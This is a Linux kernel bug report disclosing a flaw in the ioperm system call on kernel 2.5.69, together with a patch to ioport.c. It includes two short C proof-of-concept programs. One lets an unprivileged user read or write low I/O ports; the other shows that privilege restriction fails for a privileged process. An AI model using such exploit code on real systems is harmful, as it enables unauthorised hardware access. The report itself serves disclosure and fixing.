http://bugme.osdl.org/show_bug.cgi?id=703
Summary: Security vulnerability in "ioperm" system call
Kernel Version: 2.5.69
Status: NEW
Severity: low
Owner: [email protected]
Submitter: [email protected]
Distribution:
Debian 3.0
Hardware Environment:
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 7
model name : Pentium III (Katmai)
stepping : 2
cpu MHz : 498.866
cache size : 512 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat
pse36 mmx fxsr sse
bogomips : 992.87
Software Environment:
Gnu C 2.95.4
Gnu make 3.79.1
util-linux 2.11n
mount 2.11n
modutils 2.4.15
e2fsprogs 1.27
Linux C Library 2.2.5
Dynamic linker (ldd) 2.2.5
Procps 2.0.7
Net-tools 1.60
Console-tools 0.2.3
Sh-utils 2.0.11
Problem Description:
The "ioperm" system call allows an unprivileged user to gain read and write
access to I/O ports on the system. When used by a privileged process, the
"ioperm" system call also fails to properly restrict privileges.
Steps to reproduce:
Example One -- The following program when run as an unprivileged user will
allow him or her to read from or write to I/O ports with addresses which are
below 0x3ff (1023).
# include <stdio.h>
# include <sys/io.h>
# include <stdlib.h>
int main(int argc, char **argv)
{
if (argc < 2) {
(void) fprintf(stderr, "Usage: %s PORT [VALUE]\n", argv[0]);
return (2);
}
if (ioperm(1023, 1, 0) == -1) {
perror("ioperm");
return (1);
}
if (argc < 3) {
(void) printf("0x%02x\n", inb(atoi(argv[1])));
} else {
outb(atoi(argv[2]), atoi(argv[1]));
}
return (0);
}
Example Two -- This next program when run as a privileged user demonstrates
how "ioperm" fails to properly restrict privileges.
# include <sys/io.h>
# include <stdio.h>
int main(void)
{
if (ioperm(888, 1, 1) == -1) {
perror("ioperm");
return (1);
}
(void) printf("0x%02x\n", inb(889));
return (0);
}
diff -urN linux-2.5.64-bk5/arch/i386/kernel/ioport.c linux/arch/i386/kernel/ioport.c
--- linux-2.5.64-bk5/arch/i386/kernel/ioport.c 2003-02-24 14:59:03.000000000 -0500
+++ linux/arch/i386/kernel/ioport.c 2003-03-14 10:19:48.000000000 -0500
@@ -84,15 +84,17 @@
t->ts_io_bitmap = bitmap;
}
- tss = init_tss + get_cpu();
- if (bitmap)
- tss->bitmap = IO_BITMAP_OFFSET; /* Activate it in the TSS */
-
/*
* do it in the per-thread copy and in the TSS ...
*/
set_bitmap(t->ts_io_bitmap, from, num, !turn_on);
- set_bitmap(tss->io_bitmap, from, num, !turn_on);
+ tss = init_tss + get_cpu();
+ if (tss->bitmap == IO_BITMAP_OFFSET) { /* already active? */
+ set_bitmap(tss->io_bitmap, from, num, !turn_on);
+ } else {
+ memcpy(tss->io_bitmap, t->ts_io_bitmap, IO_BITMAP_BYTES);
+ tss->bitmap = IO_BITMAP_OFFSET; /* Activate it in the TSS */
+ }
put_cpu();
out:
return ret;